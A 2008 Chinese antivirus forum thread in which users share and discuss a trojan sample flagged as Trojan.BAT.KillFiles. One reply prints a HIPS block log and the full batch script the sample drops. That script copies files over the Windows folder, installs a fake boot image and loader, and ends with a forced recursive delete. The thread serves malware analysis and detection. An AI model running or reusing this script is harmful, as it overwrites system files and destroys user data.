卡饭论坛 » 病毒样本区 » 超级巡警抓到的样本

免费的安全盛宴 \| 关于安全软件的12个谣言和误会~	卡巴官方最新正式版 \| 官方最新测试版	帮助他人，快乐自己 \| 助人者，人助之	91款国外杀毒软件官方介绍附优秀文章
论坛常见问题解答 \| 相逢在论坛	从杀毒软件到文化 \| 我们为什么要装防火墙	hips新手入门 \| 卡饭HIPS教程集合	病毒样本区 \| 费尔区

13 12 ››

打印

[病毒样本] 超级巡警抓到的样本

水晶

卡饭_小有名气

Rank: 2

帖子: 770
积分: 953
技术值: 0
魅力值: 0
人气值: 0
防御装备: 江民
来自: 爱毒霸社区
注册时间: 2007-12-23

1楼大中小发表于 2008-8-19 07:58 只看该作者

[小贴士]“杀软误报”帖发布格式_发现可能的误报请按此格式发布

超级巡警抓到的样本

Tags: 巡警样本特洛伊木马超级 WINDOWS

发现病毒:Trojan.BAT.KillFiles.ev 处理结果:清除成功描述:特洛伊木马文件路径:"C:\WINDOWS\Temp\yjhy\setup.exe"

附件: 您所在的用户组无法下载或查看附件

TOP

下载您所需要的计算机安全软件_杀毒软件_防火墙_HIPS_安全软件套装

kikyo9527

奔裸去。嘿嘿

卡饭_小有名气

Rank: 2

帖子: 289
积分: 431
技术值: 0
魅力值: 0
人气值: 0
防御装备: 用啥好呢？？？
来自: 窝在北京涅
注册时间: 2008-7-27

2楼大中小发表于 2008-8-19 08:20 只看该作者

[推荐阅读]迈进HIPS的瑰丽花园

干掉

附件: 您所在的用户组无法下载或查看附件

TOP

lg560852

KaFan Hunters

Rank: 7 Rank: 7 Rank: 7

GLA成员

帖子: 393
积分: 1507
技术值: 0
魅力值: 0
人气值: 3
防御装备: 全裸
来自: 动物家园
注册时间: 2006-9-4

KaFan Hunters:冷静独立交流

3楼大中小发表于 2008-8-19 08:25 只看该作者

这个有啥行为没？
在线分析就报了一木马，然后创建了2个文件夹，完了
http://www.threatexpert.com/repo ... b4fa248dd9977d85768
倒是，这个病毒的图标很好看

[ 本帖最后由 lg560852 于 2008-8-19 08:28 编辑 ]

动物家园安全咨询中心

TOP

卡饭学院电子书系列之五---主机入侵防御系统（HIPS）入门和使用

syfwxmh

无限梦幻评测室主管

卡饭_病毒测试组

Rank: 7 Rank: 7 Rank: 7

IDS CEO And KL HIPS Tester

帖子: 5331
积分: 8557
技术值: 3
魅力值: 7
人气值: 69
防御装备: KIS 2009 CF1
来自: 中国-北京
注册时间: 2007-7-29

卡饭病毒测试小组:严谨冷静执着责任

4楼大中小发表于 2008-8-19 08:38 只看该作者

TOKL

无限梦幻评测室总管 KL HIPS Tester
IT168安全区撰稿人绅博VIP Brother Soft Web
误报: 请用False alarm作标题
钓鱼网页:请用Phishing Web Site作标题
手机病毒:请用Mobile virus作标题
地址:newvirus@kaspersky.com 请用infected作加密的密码

TOP

忧郁浪子

点饭一小兵

卡饭_知名人士

Rank: 2

hips超级菜鸟

帖子: 1082
积分: 1537
技术值: 0
魅力值: 3
人气值: 0
防御装备: TF、Avast、EQ、微点、费尔、风云、pctools
注册时间: 2007-8-26

5楼大中小发表于 2008-8-19 09:16 只看该作者

复制内容到剪贴板

代码:

2008-08-19 09:13:10    运行应用程序      操作:阻止

进程路径:F:\virus\setup\setup.exe

文件路径:C:\WINDOWS\system32\cmd.exe

命令行:/c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\1520093.bat  

触发规则:所有程序规则->禁止该位置->%windir%\*

1520093.bat内容如下：

复制内容到剪贴板

代码:

@Echo Off

Copy /y windows\*.* c:\windows >nul

nt.exe

;Echo 程序正在运行,请稍等,12秒钟后自动重启电脑...

sleep 12

If Exist c:\boot\ghos. rd /s /q c:\boot\ghos

If Exist c:\GHLDR attrib -r -s -h c:\GHLDR

If Exist c:\GHLDR Del GHLDR

md c:\boot\ghos

Copy PQVF.VFD c:\boot\ghos\dos.img >nul

Copy menu.lst c:\boot\ghos\ >nul

Copy GHLDR c:\ >nul

Copy IMG.exe c:\boot\ghos >nul

Del IMG.exe

Cd\

c:

Cd c:\boot\ghos

Echo cdqd >cdqd.exe

IMG A dos.img cdqd.exe

Del IMG.exe

Del cdqd.exe

Del /f /s /q .

TOP

fireworld

KaFan Hunters

Rank: 7 Rank: 7 Rank: 7

帖子: 433
积分: 460
技术值: 0
魅力值: 0
人气值: 3
防御装备
注册时间: 2007-3-31

KaFan Hunters:冷静独立交流

6楼大中小发表于 2008-8-19 10:39 只看该作者

破坏dos工具箱的？

TOP

kkgh

卡饭_见习写手

Rank: 3 Rank: 3

帖子: 2032
积分: 2032
技术值: 0
魅力值: 0
人气值: 0
防御装备
注册时间: 2007-9-9

7楼大中小发表于 2008-8-19 10:42 只看该作者

诺顿杀

TOP

cruiyong

xlsn

卡饭_知名人士

Rank: 2

开始--关闭计算机--关闭

帖子: 1010
积分: 1591
技术值: 0
魅力值: 0
人气值: 0
防御装备: ESS+个人经验
来自: 广州市
注册时间: 2007-5-27

8楼大中小发表于 2008-8-19 12:34 只看该作者

有这些动作

附件: 您所在的用户组无法下载或查看附件

相遇不是偶然,而是必然!

TOP

luxiao200888

样本区热心卡饭

Rank: 6 Rank: 6

Jay Chou

帖子: 1384
积分: 2057
技术值: 0
魅力值: 1
人气值: 15
防御装备: ESET 4.0
来自: 山东
注册时间: 2008-7-20

9楼大中小发表于 2008-8-19 13:01 只看该作者

TR/Horse.HK Trojan

TOP

龙城小武

卡饭_见习会员

Rank: 1

帖子: 44
积分: 44
技术值: 0
魅力值: 0
人气值: 0
防御装备
来自: 天涯海角
注册时间: 2007-5-13

10楼 大中小发表于 2008-8-19 13:08 只看该作者

卡巴2009过了

TOP

‹‹ 上一主题 | 下一主题 ››

13 12 ››

免费的安全盛宴 \| 关于安全软件的12个谣言和误会~	卡巴官方最新正式版 \| 官方最新测试版	帮助他人，快乐自己 \| 助人者，人助之	91款国外杀毒软件官方介绍附优秀文章
论坛常见问题解答 \| 相逢在论坛	从杀毒软件到文化 \| 我们为什么要装防火墙	hips新手入门 \| 卡饭HIPS教程集合	病毒样本区 \| 费尔区